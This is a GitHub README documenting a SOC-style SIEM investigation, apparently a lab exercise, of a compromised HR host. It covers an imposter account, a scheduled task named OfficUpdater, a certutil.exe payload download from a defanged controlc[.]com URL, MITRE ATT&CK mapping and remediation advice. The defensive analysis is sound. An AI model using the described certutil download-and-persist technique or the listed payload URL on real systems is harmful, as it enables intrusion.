Skip to content

Tam-George10/Siem-investigations

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

24 Commits
 
 
 
 

Repository files navigation

SIEM Investigations – Suspicious Process Execution (HR Department)

This repository documents a hands-on SOC investigation focused on identifying, analyzing, and responding to suspicious process execution activity on a host within the HR department. The project follows a real-world Blue Team workflow, including log ingestion, alert triage, user behavior analysis, LOLBIN and scheduled task investigation, network activity analysis, and threat intelligence correlation.


Investigation Scenario

An IDS alert indicated suspicious process execution on a host in the HR department, suggesting a potential compromise. Analysis revealed the execution of tools commonly associated with network information gathering and scheduled task creation, confirming malicious behavior.

Due to limited resources, only Windows process creation logs (Event ID 4688) were collected and ingested into Splunk under the win_eventlogs index for further investigation.

Network Context

The organization’s network is divided into three departments:

IT Department

  • James
  • Moin
  • Katrina

HR Department

  • Haroon
  • Chris
  • Diana

Marketing Department

  • Bell
  • Amelia
  • Deepak

This segmentation was used to correlate suspicious activity to specific departments and users during the investigation.


Description

This project focuses on the full investigation and triage of suspicious process execution to determine whether it represents legitimate activity or malicious compromise within the HR department host.

Investigation Workflow Overview:

  • 🖥️ Log Collection & Ingestion – Gather Windows process execution logs (Event ID 4688) and ingest them into Splunk for structured analysis
  • 🔍 Alert Analysis & Triage – Review IDS alerts to identify hosts and processes of interest
  • 👤 User Activity Correlation – Map observed activity to network segmentation and departmental users to detect anomalous behavior and imposters
  • 🛠️ Scheduled Task & LOLBIN Investigation – Identify execution of Living-off-the-Land Binaries (LOLBINs) and scheduled tasks used for reconnaissance or payload delivery
  • 🌐 Network & Host Analysis – Determine which third-party sites were accessed, files downloaded, and endpoint artifacts present
  • 📂 Artifact Collection & Evidence Documentation – Extract downloaded files, record filenames, hashes, and other indicators of compromise for further triage
  • 📑 Reporting & MITRE ATT&CK Mapping – Document investigation findings, correlate with MITRE ATT&CK tactics and techniques, and provide actionable recommendations

All analysis was performed in a controlled environment to ensure safe handling of potentially malicious content.


Tools Used

  • Splunk: SIEM platform used for log ingestion, querying, and correlation
  • Windows Event Logs: Primary source of process execution information (Event ID 4688)
  • Vim / Text Editors: Used to review raw log data and extract relevant information

Utilities Used

Oracle VirtualBox: Provided an isolated sandbox environment for safely handling and analyzing potentially malicious files and logs.
Splunk Query Editor: Used to build, test, and refine SPL queries for analysis of event logs and alert correlation.
Browser / Network Tools: Standard browsers and online tools (e.g., VirusTotal, WHOIS lookups) used for network artifact investigation, IP reputation, and malware source verification.


Investigation Findings

1. Log Collection & Ingestion

March Logs

2. Alert Analysis & Initial Triage

  • IDS alert identified suspicious process execution on HR host
  • Suspicious Username Observed: [Amel1a]
  • Timeline of suspicious processes: [3/5/22 12:54:30.000 PM]

IDS Alert

IDS Alert

3. User Activity Correlation

User Activity

4. Scheduled Task & LOLBIN Investigation

LOLBIN Execution

5. Network Analysis

Network Activity

6. Host Analysis

Host Activity


Indicators of Compromise (IOCs)

  • Imposter Username: Amel1a
  • Legitimate Lookalike Username: Amelia
  • Compromised User Account: Chris.fort
  • Compromised User Account: Haroon
  • Affected Department: Human Resources (HR)
  • Affected Host: HR_02
  • Malicious Scheduled Task Name: OfficUpdater
  • Persistence Mechanism: Windows Scheduled Task (schtasks)
  • LOLBIN Used: certutil.exe
  • Downloaded Payload Name: Benign.exe
  • Payload Execution Date: 2022-03-04
  • Payload Execution Time: 10:38:28 AM
  • External Domain Contacted: controlc[.]com
  • External URL: https://controlc[.]com/e4d11035
  • Payload Source Type: Third-party file hosting service
  • Log Source: Windows Event Logs (Event ID 4688)

MITRE ATT&CK Mapping

  • T1036 – Masquerading
    Imposter account Amel1a closely resembled a legitimate user (Amelia), indicating account masquerading.
  • T1078 – Valid Accounts
    Legitimate HR user accounts (Chris.fort, Haroon) were used to execute malicious activity.
  • T1053.005 – Scheduled Task / Job: Scheduled Task
    A scheduled task (OfficUpdater) was created to establish persistence and execute a malicious binary on system startup.
  • T1218 – Signed Binary Proxy Execution
    The native Windows utility certutil.exe was abused as a Living-off-the-Land Binary (LOLBIN) to bypass security controls.
  • T1105 – Ingress Tool Transfer
    A payload (benign.exe) was downloaded from an external source using certutil.exe.
  • T1071 – Application Layer Protocol
    The infected host communicated with a third-party web service (controlc[.]com) over HTTP(S).

Final Assessment & Recommendations

The investigation confirmed that the suspicious process execution activity observed on HR department hosts was the result of a confirmed compromise. Analysis of Windows process creation logs (Event ID 4688) revealed multiple stages of attacker activity, including account masquerading, persistence establishment, and malicious payload delivery using native system utilities.

A suspicious imposter account (Amel1a) was identified during log review, closely resembling a legitimate user account (Amelia). Further analysis revealed abuse of valid HR user accounts (Chris.fort and Haroon) to execute scheduled tasks and download an external payload using the Living-off-the-Land Binary certutil.exe. The payload was retrieved from a third-party file-sharing service and successfully written to disk, confirming post-compromise activity.

Based on the collected evidence, the following actions are recommended:

  • Immediate account remediation: Reset passwords and review access privileges for all affected and related HR user accounts, including monitoring for additional imposter or lookalike usernames.
  • Persistence eradication: Identify and remove unauthorized scheduled tasks, including the task named OfficUpdater, and verify system startup configurations across HR hosts.
  • LOLBIN abuse prevention: Restrict or monitor execution of high-risk native utilities such as certutil.exe through endpoint protection policies and application control.
  • Network containment: Block identified external infrastructure, including the defanged domain controlc[.]com and associated URLs, at network security and proxy layers.
  • Threat detection enhancement: Create and deploy SIEM correlation rules to detect scheduled task creation, certutil-based downloads, and execution of binaries from temporary user directories.
  • Post-incident monitoring: Increase monitoring across HR department systems for signs of lateral movement, repeated execution attempts, or additional payload retrieval.

Case Closure

The incident was successfully investigated and documented using available host-based telemetry. All identified Indicators of Compromise (IOCs), including user accounts, command-line artifacts, file names, and external URLs, have been preserved for SOC reporting and future detection. The case has been formally closed following validation of findings and implementation of recommended remediation actions.

About

SIEM Investigations showcases SOC-style investigations focused on detecting, analyzing, and responding to real-world threats using SIEM techniques. It demonstrates hands-on log analysis, event correlation, alert triage, and incident response aligned with MITRE ATT&CK and practical Blue Team workflows.

Topics

Resources

Stars

Watchers

Forks

Contributors